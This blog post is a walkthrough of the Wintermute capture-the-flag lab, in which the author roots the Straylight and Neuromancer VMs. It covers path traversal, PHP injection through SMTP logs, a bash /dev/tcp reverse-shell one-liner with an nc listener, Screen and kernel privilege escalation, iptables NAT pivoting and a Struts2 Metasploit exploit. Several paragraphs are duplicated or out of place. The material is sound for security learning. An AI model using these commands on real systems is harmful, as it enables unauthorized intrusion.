At time of writing this post Wintermule doesn't seem to have a writeup, so I decided to make one. After finally getting root on both machines, I've to say this was a hard challenge. I'm fairly new to this whole pentesting gig so it took me a while to figure stuff out. But at the same time it was a great experience and I've learned a lot. Obviously now looking back at it with perspective, it doesn't seem that hard, but trust me it really pushed me to the ends of my wits.
Challenge consists of two virtual machines, Straylight and Neuromancer, with "plot" revolving around cyberpunk classic "Neuromancer" by William Gibson (tried reading it once but translation in my native language was terrible, I need to get me an original :).
Straylight has two interfaces, first connected to outside world, second connected to internal network. Neuromancer has only one inferface, connected to internal network (same subnet as first machine), so the goal is to tackle Strayligh first, then pivot to the Neuromancer. In general, whole challenge is about pivoting a lot.
Setting up VMs was fairly straightforward. After that I've logged in to my Kali machine and began hacking.
Quick summary
This writeup is quite long, so for those looking for quick hint, below is a short summary of steps:
- Service enumeration on Straylight;
- Checking web site 1;
- Checking web site 2;
- Pivoting to web site 3 (look for url in web site 2);
- Exploiting path traversal in php script on web site 3, getting limited shell;
- Privelege escalation via vulnerable app (look for SUID), getting root;
- Setting up routing between kali <-> straylight <-> neuromancer;
- Service enumeration on Neurmancer;
- Remote exploiting Neuromancer, getting shell;
- Exploiting Neuromancers kernel, getting root.
Part 1: Enumeration
First thing to do was to discover IP address of first machine. I did this using netdiscover:
netdiscover -i eth1 -r 192.168.56.0/24
Results:
Since first IP is gateway, and second is DHCP server, only valid IP left was the one that I've marked red - this is Silverlight machine.
Knowing it's IP I've moved to the next stage which was nmap scan:
nmap -A -p- 192.168.56.105
Results:
So as you can see there were 3 services running:
- Postfix/smtp on port 25;
- Apache2/httpd on port 80;
- Apache/hadoop on port 3000;
Yet again I've fired up nmap, this time with --script parameter pointing to NSA script that I've downloaded from https://www.computec.ch/projekte/vulscan/. It's basically a module that enhances nmap with vulnerability scan capabilities (thanks Sekurak! https://sekurak.pl/nmap-w-akcji-przykladowy-test-bezpieczenstwa/)
nmap -sV --script=vulscan -p T:25,80,3000
I was hoping for some quick exploit, but unfortunately above command didn't yield any actionable results.
I assumed I'm probably not going to get shell via Postfix, so my next step was to look closer into web applications on ports 80 and 3000.
First, I used dirb:
dirb http://192.168.56.105 -R
Result:
There was /manual directory, which I decided to skip since I knew it would take lots of time to scan it (and I doubted it contains anything I could use), and hence the -R parameter in dirb.
Next, I used nikto:
nikto -h 192.168.56.105
But it didn't produce any usefull results - so I moved to the last service, web application on port 3000. Unfortunately again Dirb didn't produce anything usefull, as well as nikto.
At this point I didn't had much, so I've decided to check both services in the browser and look for vulnerabilities in the web apps.
Part 2: Web applications
I've started with first webapp on port 80. It was just some generic "welcome to the challenge" page. I've checked source code and decided to move on to the second webapp on port 3000.
This was more interesing, as landing page served me login page to the app called ntopng - which is a web-based network traffic monitoring application. Getting into it was a no brainer since there was a little hint in the bottom of the login form.
After logging in, I've checked ntopng app content, and found "About ntopng" page:
Right away this smelled like a path traversal vulnerability, so I've tried passing different paremeters to bolo.php and it looked like I was on the right track - I didn't get any 404s, just a blank page.
But it didn't yield any results.
I got a little frustrated here, started trying different combinations, and finally found out I can peek into /var/log directory and view some of the files that were there - like mail.log. So based on that and what was written on the landing page:
Operator Gamma: Adding other member logs to directory...:
molly.log
armitage.log
riviera.log
This was more interesing, as landing page served me login page to the app called ntopng - which is a web-based network traffic monitoring application. Getting into it was a no brainer since there was a little hint in the bottom of the login form.
This looked really interesting - full technology stack used by ntopng with versions listed. I thought maybe something here is vulnerable and I can exploit it, so I began manually checking CVE databases. To my disappointment, most of them had vulnerabilities, but none was usefull to me. Nothing that would give me shell.
At this point I got stuck really bad. I've retraced my steps twice, thinking maybe I missed something. I've spent couple hours walking in circles, moved back to the Postfix/SMTP that I left for later, discover it requires no authentication and so I've tried shellshocking it, but it didn't work. At this point I was really desperate so I tried enumerating directory of the first web app, this time using longer wordlist with Dirbuster.
It took a while, but bo my suprise it gave me one directory I didn't found before: /freeside.
I got exicited, but unfortunately this was a dead end. It was a simple page, displaying Freeside - a space station, belonging to the Tessier-Ashpool family (bad guys from the "Neuromancer" book).
But it got me thinking - maybe there is a hidden site on this server ? Nothing else showed up on Dirbuster scan, but maybe the url is more exotic and that's why it didn't appear anywhere in wordlist. This was a yellow bulb moment for me. Thats why there is this ntopng app - hidden site url must be somewhere in there.
So I got back to ntopng and there it was:
I've no idea how did I miss it the first time - it would've saved me hours. Server IP was weird (localhost) but as I later find out, there was a bash script running in the background making constant connections to this URL.
Part 3: Path Traversal
After finding new url in ntopng I went to check it. This looked promising. On the bottom of the page there was a little dropdown list, allowing you to choose which log you wanted to display.
Right away this smelled like a path traversal vulnerability, so I've tried passing different paremeters to bolo.php and it looked like I was on the right track - I didn't get any 404s, just a blank page.
So I fired up dotdotpwn.pl:
dotdotpwn.pl -m http-url -u http://192.168.56.105/turing-bolo/bolo.php?bolo=TRAVERSAL -k "root:"
But it didn't yield any results.
I got a little frustrated here, started trying different combinations, and finally found out I can peek into /var/log directory and view some of the files that were there - like mail.log. So based on that and what was written on the landing page:
Operator Gamma: Adding other member logs to directory...:
molly.log
armitage.log
riviera.log
I figured the only files I can view are the ones ending with .log, readable by user running web server.
Closer look into mail.log file revealed it contained shellshock code that I've tried before:
This was great news, as this meant I could probably inject php code in there as well, and use it to spawn me a shell!
Part 4: Getting shell
As i wrote before, I already knew that Postfix/SMTP didn't require authentication. So the simplest thing to do was to fire up good 'ol telnet and try to inject a PHP code. Mind you this took me some time before getting it right.
After the injection was done, I've checked the logs again to see if it worked.
And there it was. So now the only thing to do was to cook up some php-shell-spawning-one-liner.
Since I don't know PHP that well, I used google and found this beauty:
<? php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102:4444 0>&1'"); ?>
Source: https://gist.github.com/rshipp/eee36684db07d234c1cc
What this piece of code does, is it spawns an interactive bash shell, redirects it's output (>&) to TCP socket (which this process creates) connected to my Kali box, and then reads this socket input (0>&1).
What this piece of code does, is it spawns an interactive bash shell, redirects it's output (>&) to TCP socket (which this process creates) connected to my Kali box, and then reads this socket input (0>&1).
I started nc on my kali machine:
nc -lvp 4444
Injected the code, refreshed the page, and there it was - finally a shell:
Part 5: Upgrading shell
As we all know, limited shell via nc is hatefull, so first thing to do was to spawn me a normal shell.
I googled a bit and found this cute porgram called Socat and a great article describing how to use it:
This was perfect for me so I uploaded Socat binary to Straylight using wget, executed described method and got normal shell.
I strongly recommend getting familiar with this program, it just makes your life easier.
I strongly recommend getting familiar with this program, it just makes your life easier.
Part 6: Privelege escalation
Finally came the time to escalate to root. As I said I'm new in this field and it has taken me a lot of time and research on this topic before I came up with the solution. It might seem simple now, but trust me, it wasn't.
First, I used this great cheat sheet: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
But it would take a lot of time to go through each of the listed commands, so I started looking for a way to automate the process, and I found this neat python script:
https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
I've checked the results (actually I've checked them several times, and even redo some of the tests manually before figuring this out) and one thing that stood out was Screen-4.5.0 program with SUID set. Mind you screen with SUID is not weird, it was the exact version of it in the filename that seemed a bit off to me.
So again I went for advice to uncle google, and suprise suprise, Screen-4.5.0 is vulnerable to local privelege escalation: https://www.exploit-db.com/exploits/41154/
I've downloaded above exploit using wget to the target machine and fired it up:
And there it was finally :) Again I used the trick with Socat to upgrade my shell and read the contents of /root/
Especially interesting was the bit about custom Java App with URL.
Especially interesting was the bit about custom Java App with URL.
Part 7: Setting up routing
As descrived in the begging of this writeup, network situation looked like this (please don't judge, my network diagram creation skills are not so good):
Since my Kali Box was in different network than Neuromancer, in order to get to it, I first had to go via Silverlight. The idea was to use Silverlight as router. Simplest way to do it would be to enable forwarding on Silverlight, add route to network 192.168.254.0/24 via 192.168.56.105 to Kail, and 192.168.56.0/24 via 192.168.254.3 to Neuromancer. But because I didn't have access to Neuromancer , this was impossible. Kali would have access to 192.168.254.0/24, but nothing would came back.
Other way to do it would be to make Silverlight default gateway for both machines. I could've arp poison Neuromancer, tricking it into thinking Silverlights MAC is it's gateway, but since Neuromancer was in isolated VBox Host-Only network, it didn't have any default gateway to begin with.
Other way to do it would be to make Silverlight default gateway for both machines. I could've arp poison Neuromancer, tricking it into thinking Silverlights MAC is it's gateway, but since Neuromancer was in isolated VBox Host-Only network, it didn't have any default gateway to begin with.
So the only way to do it was setting up NAT on Silverlight, which is exactly what I did.
iptables -t nat -A POSTROUTING -o eth1 -j SNAT --to-source 192.168.254.3
Setting up forwarding is very easy and there is plenty of tutorials explaining that already so I'm not going to do that here.
I also needed to add route to 192.168.254.0/24 to my kali box.
ip r add 192.168.254.0/24 via 192.168.56.105
Next thing to do was to find out Neuromancers IP Address. I couldn't use netdiscover, because it relies on APR which is not routable. So I peeked at APR table on Silverlight:
IP on the top was the one I was looking for. I knew this because 192.168.254.3 was the IP of Silverlight, and there was no other machines in the subnet. In the real case scenario there might be more than two machines in the subnet, so this is not the best way to do it.
Anyway, now I had Neuromancers IP and I could begin enumeration of it's services.
Part 8: Neuromancer enumeration
Same as with Silverlight, I fired up nmap.
And got three services:
- Apache Jserv on 8009;
- Apache/Tomcat on 8080;
- SSH on 34483;
Tomcat on 8080 was no suprise since I already knew it's there from the note contents on silverlight. I decided to focus on it first.
From URL I knew the exact version of this service (Apache Struts2 2.3.15.1) so I started looking for exploits. There was quite few of them, so I searched a little bit more, and found out that the one I'm looking for is included in metasploit framework, under the name struts2_content_type_ognl.
I've set rhost and targeturi options to point to application, then choose payload linux/x86/shell/reverse_tcp, and set lhost to Silverlight IP 192.168.254.3 and lport to 4477. I couldn't point payload to my Kali box directly, because as you might remember it was sitting behind NAT. So I had to add a little port-forwarding rule to Silverlight box.
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 4477 -j DNAT --to-destination 192.168.56.102
After that I fired the exploit.
And from the looks of it, it was super effective. I got shell on user ta. Once again I did a little Socat magic to ease me in my endevours and proceeded to the last stage.
Part 9: Privelege escalation on Neuromancer
To be honest, getting root on this box was easy, compared to the rest of the challenge. I found out kernel version and distro:
And quick google search revealed existing kernel exploit: https://www.exploit-db.com/exploits/44298/
I've compiled it using gcc and again used wget to download it (I had to open another port for this).
And quick google search revealed existing kernel exploit: https://www.exploit-db.com/exploits/44298/
I've compiled it using gcc and again used wget to download it (I had to open another port for this).
And there it is. Contents of the flag:
Summary
This was a great experience and I had a lot of fun. Thanks to @creosote for creating this challenge. If I had to summarize what I've learned - enumeration is everything. I can't stress this enough. If I would have focus a bit more on thorough enumeration, I would have finished this challenge much quicker.
Thats it folks, thanks for reading. I'll be posting more of those soon.
No comments:
Post a Comment